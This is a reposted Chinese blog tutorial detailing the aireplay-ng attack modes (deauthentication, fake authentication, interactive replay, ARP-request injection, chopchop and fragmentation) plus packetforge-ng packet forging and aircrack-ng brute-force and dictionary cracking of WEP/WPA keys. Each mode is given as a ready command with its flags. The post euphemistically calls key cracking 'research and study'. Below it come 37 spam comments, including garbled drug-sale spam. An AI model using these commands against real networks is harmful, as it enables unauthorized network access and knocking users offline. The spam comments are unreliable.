LSX-blog

Feed Rss

【转载】Aireplay-ng 的 6 种攻击模式详解

05.11.2013, 破解, by .

Aireplay-ng 的 6 种攻击模式详解

-0 Deautenticate 冲突模式

使已经连接的合法客户端强制断开与路由端的连接,使其重新连接。在重新连接过程中获得验证数据包,从而产生有效 ARP request。

如果一个客户端连在路由端上,但是没有人上网以产生有效数据,此时,即使用-3 也无法产生有效 ARP request。所以此时需要用-0 攻击模式配合,-3 攻击才会被立刻激活。

aireplay-ng -0 10 –a <ap mac> -c <my mac> wifi0 参数说明:

【-0】:冲突攻击模式,后面跟发送次数(设置为 0,则为循环攻击,不停的断开连接,客户端无法正常上网)

【-a】:设置 ap 的 mac

【-c】:设置已连接的合法客户端的 mac。

如果不设置-c,则断开所有和 ap 连接的合法客户端。

aireplay-ng -3 -b <ap mac> -h <my mac> wifi0

注:使用此攻击模式的前提是必须有通过认证的合法的客户端连接到路由器

-1 fakeauth count 伪装客户端连接

这种模式是伪装一个客户端和 AP 进行连接。

这步是无客户端的研究学习的第一步,因为是无合法连接的客户端,因此需要一个伪装客户端来和路由器相连。为让 AP 接受数据包,必须使自己的网卡和 AP 关联。如果没有关联的话,目标 AP 将忽略所有从你网卡发送的数据包,IVS 数据将不会产生。

用-1 伪装客户端成功连接以后才能发送注入命令,让路由器接受到注入命令后才可反馈数据从而产生 ARP 包。

aireplay-ng -1 0 –e <ap essid> -a <ap mac> -h <my mac> wifi0

参数说明:

【-1】:伪装客户端连接模式,后面跟延时

【-e】:设置 ap 的 essid

【-a】:设置 ap 的 mac

【-h】:设置伪装客户端的网卡 MAC(即自己网卡 mac)

-2 Interactive 交互模式

这种攻击模式是一个抓包和提数据发攻击包,三种集合一起的模式

1.这种模式主要用于研究学习无客户端,先用-1 建立虚假客户端连接然后直接发包攻击 ,

aireplay-ng -2 -p 0841 -c ff:ff:ff:ff:ff:ff -b <ap mac> -h <my mac> wifi0

参数说明:

【-2】:交互攻击模式

【-p】:设置控制帧中包含的信息(16 进制),默认采用 0841

【-c】:设置目标 mac 地址

【-b】:设置 ap 的 mac 地址

【-h】:设置伪装客户端的网卡 MAC(即自己网卡 mac)

2.提取包,发送注入数据包 aireplay-ng -2 –r <file> -x 1024 wifi0 发包攻击.其中,-x 1024 是限定发包速度,避免网卡死机,可以选择 1024。

-3 ARP-request 注入攻击模式

这种模式是一种抓包后分析重发的过程 这种攻击模式很有效。既可以利用合法客户端,也可以配合-1 利用虚拟连接的伪装客户端。如果有合法客户端那一般需要等几分钟,让合法客户端和 ap 之间通信,少量数据就可产生有效 ARP request 才可利用-3模式注入成功。如果没有任何通信存在,不能得到 ARP request.,则这种攻击就会失败。

如果合法客户端和ap之间长时间内没有 ARP request,可以尝试同时使用-0 攻击. 如果没有合法客户端,则可以利用-1 建立虚拟连接的伪装客户端,连接过程中获得验证数据包,从而产生有效 ARP request。再通过-3 模式注入。

aireplay-ng -3 -b <ap mac> -h <my mac> -x 512 wifi0

参数说明:

【-3】:arp 注入攻击模式

【-b】:设置 ap 的 mac

【-h】:设置

【-x】:定义每秒发送数据户包的数量,但是最高不超过 1024,建议使用 512(也可不定义)

-4 Chopchop 攻击模式

用以获得一个包含密钥数据的 xor 文件 这种模式主要是获得一个可利用包含密钥数据的 xor 文件,不能用来解密数据包。而是用它来产生一个新的数据包以便我们可以进行注入。

aireplay-ng -4 -b <ap mac> -h <my mac> wifi0 参数说明:

【-b】:设置需要研究学习的 AP 的 mac

【-h】:设置虚拟伪装连接的 mac(即自己网卡的 mac)

-5 fragment 碎片包攻击模式

用以获得 PRGA(包含密钥的后缀为 xor 的文件) 这种模式主要是获得一个可利用 PRGA,这里的 PRGA 并不是 wep key 数据,不能用来解密数据包。而是用它来产生一个新的数据包以便我们可以进行注入。其工作原理就是使目标 AP 重新广播包,当 AP 重广播时,一个新的 IVS 将产生,我们就是利用这个来研究学习 !

aireplay-ng -5 -b <ap mac> -h <my mac> wifi0

【-5】:碎片包攻击模式

【-b】:设置 ap 的 mac

【-h】:设置虚拟伪装连接的 mac(即自己网卡的 mac)

Packetforge-ng:数据包制造程序 Packetforge-ng <mode> <options>Mode

【-0】:伪造 ARP 包

packetforge-ng -0 -a <ap mac> -h <my mac> wifi0 –k 255.255.255.255 -l 255.255.255.255–y<.xor file> -w mrarp

参数说明:

【-0】:伪装 arp 数据包

【-a】:设置 ap 的 mac

【-h】设置虚拟伪装连接的 mac(即自己的 mac)

【-k】<ip[:port]>说明:设置目标文件 IP 和端口

【-l】<ip[:port]>说明:设置源文件 IP 和端口

【-y】<file>说明:从 xor 文件中读取 PRGA。后面跟 xor 的文件名。

【-w】设置伪装的 arp 包的文件名 Aircrack-ng:WEP 及 WPA-PSK key 研究学习主程序

Aircrack-ng [optin] <.cap/.ivs file>Optin aircrack-ng -n 64 -b <ap mac> name-01.ivs )

参数说明:

【-n】:设置 WEP KEY 长度(64/128/152/256/512)aircrack-ng -x -f 2 name-01h.cap

参数说明:

【-x】:设置为暴力研究学习模式

【-f】:设置复杂程度,wep 密码设置为 1,wpa 密码设置为 2 aircrack-ng -w password.txt ciw.cap

【-w】:设置为字典研究学习模式,后面跟字典文件,再后面跟是我们即时保存的那个捕获到 WPA 验证的抓包文件。

【转载】Aireplay-ng 的 6 种攻击模式详解 有 37 条回应

  1. I don’t know whether it’s just me or if everyone else experiencing problems with your site. It appears as though some of the text within your posts are running off the screen. Can somebody else please comment and let me know if this is happening to them too? This may be a problem with my web browser because I’ve had this happen before. Cheers| а

    回复
  2. Hi! I could have sworn I’ve been to this website before but after checking through some of the post I realized it’s new to
    me. Nonetheless, I’m definitely delighted I found it and I’ll be book-marking and checking back frequently!

    回复
  3. I think that everything published was very logical.
    But, what about this? suppose you added a little information? I mean,
    I don’t want to tell you how to run your website, but what if you added something that
    grabbed people’s attention? I mean 【转载】Aireplay-ng 的 6 种攻击模式详解 – LSX-blog
    is a little plain. You might peek at Yahoo’s front page and see how they create post headlines to get viewers to click.
    You might add a related video or a picture or two to get readers interested about everything’ve written. Just my opinion, it could bring your posts
    a little bit more interesting.

    回复
  4. Hey there! I’ve been reading your weblog for a while now and
    finally got the courage to go ahead and give you
    a shout out from Austin Texas! Just wanted to say keep up the great job!

    回复
  5. Every weekend i used to pay a quick visit this site, as i want enjoyment, for the reason that this this web page conations
    genuinely nice funny material too.

    回复
  6. Good day I am so delighted I found your blog, I really found you
    by accident, while I was searching on Digg for something else,
    Regardless I am here now and would just like to say many thanks for a
    tremendous post and a all round thrilling blog (I also love the theme/design), I don’t have
    time to read it all at the moment but I have book-marked it and also included your RSS feeds, so when I have time
    I will be back to read a great deal more, Please do
    keep up the awesome work.

    回复
  7. If you desire to grow your know-how just keep visiting this site and be updated with the
    most recent gossip posted here.

    回复
  8. Generally I do not learn post on blogs, but I wish to say that this write-up very compelled me to
    take a look at and do it! Your writing style has been surprised me.
    Thank you, quite great article.

    回复
  9. I blog frequently and I genuinely appreciate
    your content. Your article has really peaked my interest.

    I am going to take a note of your blog and keep checking for new information about once
    per week. I subscribed to your RSS feed as well.

    回复
  10. I have read so many content concerning the blogger lovers but this post
    is genuinely a pleasant piece of writing, keep it up.

    回复
  11. I’ll right away seize your rss feed as I can not
    find your e-mail subscription link or e-newsletter service.
    Do you have any? Please permit me recognise in order that
    I could subscribe. Thanks.

    回复
  12. For newest news you have to pay a quick visit the web and on internet I found this site as a most excellent website for most up-to-date
    updates.

    回复
  13. Hey I know this is off topic but I was wondering if you knew of any
    widgets I could add to my blog that automatically tweet my newest twitter updates.

    I’ve been looking for a plug-in like this for quite
    some time and was hoping maybe you would have some experience with something like this.
    Please let me know if you run into anything. I truly enjoy reading your blog and I look forward to your new updates.

    回复
  14. I enjoy what you guys are usually up too.
    This kind of clever work and exposure! Keep up the
    awesome works guys I’ve included you guys to blogroll.

    回复
  15. Hiya! Quick question that’s totally off topic. Do you know how to make your site mobile friendly?
    My web site looks weird when viewing from my apple
    iphone. I’m trying to find a theme or plugin that might be able to correct this problem.
    If you have any suggestions, please share. Thanks!

    回复
  16. I all the time used to study article in news papers but now as I am a user of web thus from now I am using net
    for content, thanks to web.

    回复
  17. Thanks in support of sharing such a pleasant idea, piece
    of writing is good, thats why i have read it completely

    回复
  18. You’ve made some really good points there. I looked on the internet for more information about the issue and found most people will go along with your views on this web site.

    回复
  19. Pretty section of content. I just stumbled upon your web site and in accession capital to assert that I acquire in fact enjoyed account your blog posts.
    Any way I will be subscribing to your feeds and even I achievement you access consistently quickly.

    回复
  20. Ahaa, its nice dialogue on the topic of this post at this place at
    this webpage, I have read all that, so now me also commenting at this place.

    回复
  21. Pretty nice post. I just stumbled upon your
    blog and wished to say that I’ve really enjoyed browsing your blog posts.
    After all I will be subscribing to your feed and I hope
    you write again soon!

    回复
  22. Your style is unique compared to other folks I’ve read stuff from.
    Many thanks for posting when you’ve got the opportunity,
    Guess I’ll just book mark this site.

    回复
  23. Asking questions are in fact good thing if you are not understanding something entirely,
    however this paragraph gives fastidious understanding yet.

    回复
  24. Hi, i read your blog occasionally and i own a similar one and i
    was just wondering if you get a lot of spam comments?

    If so how do you protect against it, any plugin or anything
    you can advise? I get so much lately it’s driving me mad so any
    help is very much appreciated.

    回复
  25. Hi there would you mind letting me know which web host you’re working with?
    I’ve loaded your blog in 3 completely different browsers and I must say this blog loads a lot quicker
    then most. Can you suggest a good web hosting provider at a reasonable price?
    Kudos, I appreciate it!

    回复
  26. Sweet blog! I found it while browsing on Yahoo News.
    Do you have any suggestions on how to get listed in Yahoo News?

    I’ve been trying for a while but I never seem to get there!

    Cheers

    回复
  27. Howdy, i read your blog occasionally and i own a similar one and i was just curious if you get a lot of
    spam comments? If so how do you reduce it, any plugin or anything you can advise?
    I get so much lately it’s driving me insane so any assistance is very much appreciated.

    回复
  28. Howdy! Would you mind if I share your blog with my myspace group?
    There’s a lot of people that I think would really appreciate your content.
    Please let me know. Thanks

    回复
  29. Hi! I know this is kinda off topic however , I’d figured I’d ask.
    Would you be interested in exchanging links or maybe guest writing
    a blog post or vice-versa? My site addresses a lot of the same subjects as yours and I think we could greatly benefit from each other.

    If you’re interested feel free to shoot me an email.
    I look forward to hearing from you! Fantastic blog by the way!

    回复
  30. i use it find discount is

    af29 is ohne nebenwirkunge

    回复
  31. get lowcost is

    70e5 canadian vancouver is

    回复
  32. be is pay by paypal

    70e5 erbe is is alle erbe

    回复
  33. is shopping online

    fe25 is for men and canadian

    回复
  34. be is in tampa

    cff1 forum is 2011

    回复
  35. is at does it work

    0fe2 how does daily use is work

    回复
  36. discount original is

    10c8 best mail order is

    回复
  37. we recommend is 20 mg

    8ee0 being is online australia

    回复

发表评论

电子邮件地址不会被公开。 必填项已用*标注